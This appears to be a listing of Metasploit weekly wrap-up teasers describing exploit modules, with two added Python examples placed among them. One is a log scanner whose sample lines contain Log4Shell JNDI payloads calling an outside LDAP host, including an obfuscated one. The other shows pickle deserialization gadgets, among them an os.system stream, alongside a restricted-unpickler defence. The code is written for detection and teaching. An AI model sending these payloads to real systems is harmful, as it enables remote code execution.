Metasploit Weekly Wrapup
Metasploit Weekly Wrap-Up: 4/14/23
Rocket Software UniRPC Exploits
Ron Bowes [https://github.com/rbowes-r7] submitted two exploit modules
[https://github.com/rapid7/metasploit-framework/pull/17832] for vulnerabilities
he discovered
[https://www.rapid7.com/blog/post/2023/03/29/multiple-vulnerabilities-in-rocket-software-unirpc-server-fixed/]
in the UniRPC server for Rocket Software’s UniData product. The first exploit
module, exploit/linux/misc/unidata_udadmin_auth_bypass, exploits an
authentication bypass to ultimately gain remot
Metasploit
Metasploit Weekly Wrap-Up: 1/27/23
Cacti Unauthenticated Command Injection
Thanks to community contributor Erik Wynter [https://github.com/ErikWynter],
Metasploit Framework now has an exploit module
[https://github.com/rapid7/metasploit-framework/pull/17407] for an
unauthenticated command injection vulnerability in the Cacti network-monitoring
software. The vulnerability is due to a proc_open() call that accepts
unsanitized user input in remote_agent.php. Provided that the target server has
data that's tied to the POLLER_ACTION_S
Metasploit
Metasploit Weekly Wrap-Up: Oct. 28, 2022
GLPI htmLawed PHP Command Injection
Our very own bwatters-r7 [https://github.com/bwatters-r7] wrote a module for an
unauthenticated PHP command injection vulnerability that exists in various
versions of GLPI. The vulnerability is due to a third-party vendor test script
being present in default installations. A POST request to
vendor/htmlawed/htmlawed/htmLawedTest.php directly allows an attacker to execute
exec() through the hhook and test parameters, resulting in unauthenticated RCE
as the www
Metasploit
Metasploit Wrap-Up: Aug. 26, 2022
Zimbra Auth Bypass to Shell
Ron Bowes [https://github.com/rbowes-r7] added an exploit module
[https://github.com/rapid7/metasploit-framework/pull/16922] that targets
multiple versions of Zimbra Collaboration Suite. The module leverages an
authentication bypass (CVE-2022-37042) and a directory traversal vulnerability
(CVE-2022-27925) to gain code execution as the zimbra user. The auth bypass
functionality correctly checks for a valid session; however, the function that
performs the check does not
Metasploit
Metasploit Weekly Wrap-Up: 8/5/22
Log4Shell in MobileIron Core
Thanks to jbaines-r7 [https://github.com/jbaines-r7] we have yet another
Log4Shell exploit [https://github.com/rapid7/metasploit-framework/pull/16837].
Similar to the other Log4Shell exploit modules, this one works by sending a
JNDI lookup string that, once received and logged by the server, is resolved
and deserialized, resulting in unauthenticated remote code execution as the
tomcat user. Vulnerable versions of MobileIron Core have been reported as
exploited [https://www.mandiant.com/resou
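Two of the entries above describe bugs a defender can look for in ordinary web-server access logs: the GLPI entry names a bundled vendor test script (vendor/htmlawed/htmlawed/htmLawedTest.php) that should never be reachable in production, and the MobileIron entry describes a Log4Shell JNDI lookup string arriving from an unauthenticated client. The scanner below is an added example, not Metasploit code and not any vendor's detection content. It assumes Apache/nginx Combined Log Format; the log lines are constructed for the example, and the only patterns it flags are the two facts the posts state (a request to the htmLawedTest.php path, and a `${jndi:` lookup in the request target, Referer or User-Agent, after peeling the common `${lower:j}` / `${::-j}` obfuscations).

```python
"""Scan access-log lines for the GLPI htmLawedTest.php path and Log4Shell JNDI lookups.

Added example (not Metasploit's or any vendor's code). Assumes Combined Log Format.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Path of the vendor test script the GLPI post names; compared case-insensitively.
GLPI_TEST_SCRIPT = "/vendor/htmlawed/htmlawed/htmlawedtest.php"

# Nested-lookup tricks commonly used to hide "${jndi:" from naive string matching.
_OBFUSCATION = [
    (re.compile(r'\$\{(?:lower|upper):([^}]*)\}', re.I), r'\1'),  # ${lower:j} -> j
    (re.compile(r'\$\{::-([^}]*)\}'), r'\1'),                     # ${::-j}    -> j
]
JNDI_RE = re.compile(r'\$\{jndi:', re.I)


def normalize_lookup(s: str) -> str:
    """URL-decode, then peel simple Log4j lookup nesting until nothing changes."""
    s = unquote(s)
    while True:
        prev = s
        for pat, repl in _OBFUSCATION:
            s = pat.sub(repl, s)
        if s == prev:
            return s


def parse_line(line: str) -> Optional[dict]:
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(entry: dict) -> List[str]:
    """Return the names of every pattern this log entry matches."""
    findings = []
    path = unquote(entry["target"].split("?", 1)[0]).lower()
    # Any hit on the test script is worth a look, regardless of method or status.
    if path.endswith(GLPI_TEST_SCRIPT):
        findings.append("glpi-htmlawed-test-script")
    for field in ("target", "ua", "referer"):
        if JNDI_RE.search(normalize_lookup(entry[field])):
            findings.append(f"log4shell-jndi-in-{field}")
            break
    return findings


def scan(lines) -> List[Tuple[str, str, Tuple[str, ...]]]:
    """(client ip, method, findings) for every parseable line that matched something."""
    hits = []
    for line in lines:
        e = parse_line(line)
        if e is None:  # unparseable lines are skipped, not flagged
            continue
        f = classify(e)
        if f:
            hits.append((e["ip"], e["method"], tuple(f)))
    return hits


# Constructed sample log lines (not from any real system).
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Aug/2022:10:00:01 +0000] "POST /glpi/vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1" 200 512 "-" "curl/7.81.0"',
    '10.0.0.6 - - [05/Aug/2022:10:00:02 +0000] "GET /index.jsp HTTP/1.1" 200 1024 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '10.0.0.7 - - [05/Aug/2022:10:00:03 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F203.0.113.9%2Fa%7D HTTP/1.1" 400 0 "-" "Mozilla/5.0"',
    '10.0.0.8 - - [05/Aug/2022:10:00:04 +0000] "GET /glpi/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    'this line is not in combined log format',
]

if __name__ == "__main__":
    for ip, method, findings in scan(SAMPLE_LOG):
        print(ip, method, ", ".join(findings))
```

The JNDI check deliberately runs over the decoded and de-obfuscated string rather than the raw log text, because the raw line for the third sample contains neither `jndi` nor `${` in readable form. The GLPI rule is path-only: the post says the bug is triggered by a POST, but a GET reaching the test script still shows the script is exposed, which is the condition worth fixing.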
Metasploit Weekly Wrapup
Metasploit Wrap-Up: 4/29/22
Module additions this week to enumerate all installed AV products on Windows and escape sandboxes on certain Debian-specific Redis versions. Plus, a new place for Metasploit docs focused on pen testing workflows.
Metasploit
Metasploit Weekly Wrap-Up: Mar. 4, 2022
This week’s Metasploit Framework release brings us seven new modules.
IP Camera Exploitation
Rapid7’s Jacob Baines [https://github.com/jbaines-r7] was busy this week with
two exploit modules that target IP cameras. The first
[https://github.com/rapid7/metasploit-framework/pull/16190] module exploits an
authenticated file upload on Axis IP cameras. Due to lack of proper
sanitization, an attacker can upload and install an eap application which, when
executed, will grant the attacker root privileg
Metasploit Weekly Wrapup
Metasploit Wrap-Up: Jun. 25, 2021
Three fresh modules for Cisco targets and rConfig, plus new enhancements and fixes.
Metasploit Weekly Wrapup
Metasploit Wrap-Up: Mar. 19, 2021
A local exploit for a Windows Server 2012 DLL hijacking vulnerability, plus a slew of fixes and improvements.
Metasploit Weekly Wrapup
Metasploit Wrap-Up: 11/13/20
Four new modules, including an exploit for SaltStack Salt and an exploit for a now-patched vuln in Metasploit, plus new enhancements and fixes.
Metasploit
Metasploit Wrap-Up: 7/17/20
Plex unpickling
The exploit/windows/http/plex_unpickle_dict_rce module
[https://github.com/rapid7/metasploit-framework/pull/13741] by h00die
[https://github.com/h00die] exploits an authenticated Python deserialization
vulnerability in Plex Media Server. The module exploits the vulnerability by
creating a photo library and uploading a Dict file containing a Python payload
to the library’s path. Code execution is then achieved by triggering the plugin
loading functionality, which unpickles the Dic
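The Plex entry turns on one property of Python's pickle format: unpickling a file is not parsing, it is executing whatever callables the stream names. The block below is an added example, not Plex's code and not the Metasploit module's; the `Evil` class and the hand-written protocol-0 stream are generic pickle gadgets, not anything taken from Plex's plugin loader. It shows a naive loader running an attacker-chosen callable, and a `find_class` allow-list that refuses the same streams before any callable is resolved.

```python
"""Why unpickling attacker-supplied data is code execution, and how to refuse it.

Added example; not Plex's or Metasploit's code. The os.system stream below is
only ever fed to the restricted loader, which rejects it before anything runs.
"""
import io
import pickle

EXECUTED = []  # side-effect log so a caller can prove the callable ran


def record(marker):
    """Stand-in for os.system: proves the unpickler invoked an arbitrary callable."""
    EXECUTED.append(marker)
    return marker


class Evil:
    """Whatever __reduce__ returns is *called* by the unpickler on load."""
    def __reduce__(self):
        return (record, ("unpickle ran an attacker-chosen callable",))


def malicious_blob():
    """The bytes an attacker would drop into a location the loader later unpickles."""
    return pickle.dumps(Evil())


# Protocol-0 stream an attacker can write by hand, no Python required:
# GLOBAL os.system, MARK, STRING 'echo hi', TUPLE, REDUCE, STOP.
OS_SYSTEM_BLOB = b"cos\nsystem\n(S'echo hi'\ntR."


def load_unsafe(data):
    """What a naive plugin loader does: pickle.loads on a file it did not create."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Resolve only explicitly allow-listed globals; everything else is an error."""
    ALLOWED = {"builtins": {"set", "frozenset", "range", "complex"}}

    def find_class(self, module, name):
        if name in self.ALLOWED.get(module, ()):
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def load_restricted(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_rejected(data):
    """True if the restricted loader refuses the stream without executing it."""
    try:
        load_restricted(data)
    except pickle.UnpicklingError:
        return True
    return False


def round_trip_safe(obj):
    """Plain data (dicts, lists, strings, numbers) still loads under the allow-list."""
    return load_restricted(pickle.dumps(obj))


if __name__ == "__main__":
    print("naive loader returned:", load_unsafe(malicious_blob()))
    print("side effects so far:", EXECUTED)
    print("restricted loader rejects Evil:", is_rejected(malicious_blob()))
    print("restricted loader rejects os.system gadget:", is_rejected(OS_SYSTEM_BLOB))
    print("plain data survives:", round_trip_safe({"title": "photo", "tags": ["a"]}))
```

The allow-list only helps if the data you actually need never requires resolving other globals; for a plugin registry that is normally just dicts, lists and strings. If the format legitimately needs custom classes, the safer fix is to stop using pickle for untrusted input altogether and load a schema-checked format such as JSON instead.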
Metasploit
Metasploit Wrap-Up: 6/19/20
Arista Shell Escape Exploit
Community contributor SecurityBytesMe [https://github.com/SecurityBytesMe] added
an exploit module [https://github.com/rapid7/metasploit-framework/pull/13303]
for various Arista switches. With credentials, an attacker can SSH into a
vulnerable device and leverage a TACACS+ shell configuration to bypass
restrictions. The configuration allows the pipe character to be used only if the
pipe is preceded by a grep command. This configuration ultimately allows the
chaining
Metasploit Weekly Wrapup
Metasploit Wrap-Up: 3/20/20
Five new modules plus fixes and enhancements. Exploits for ManageEngine, rConfig, and SQL Server Reporting Services, among others.
Metasploit
Metasploit Shellcode Grows Up: Encrypted and Authenticated C Shells
Introducing encrypted, compiled payloads in Metasploit Framework 5
Metasploit Weekly Wrapup
Metasploit Wrap-Up 9/27/19
BlueKeep is Here
The BlueKeep exploit module
[https://github.com/rapid7/metasploit-framework/pull/12283] is now officially a
part of Metasploit Framework. This module reached merged status thanks to lots
of collaboration between Rapid7 and the MSF community members. The module
requires some manual configuration per target, and targets include both
virtualized and non-virtualized versions of Windows 7 and Windows Server 2008.
For a full overview of the exploit’s development and notes on use and d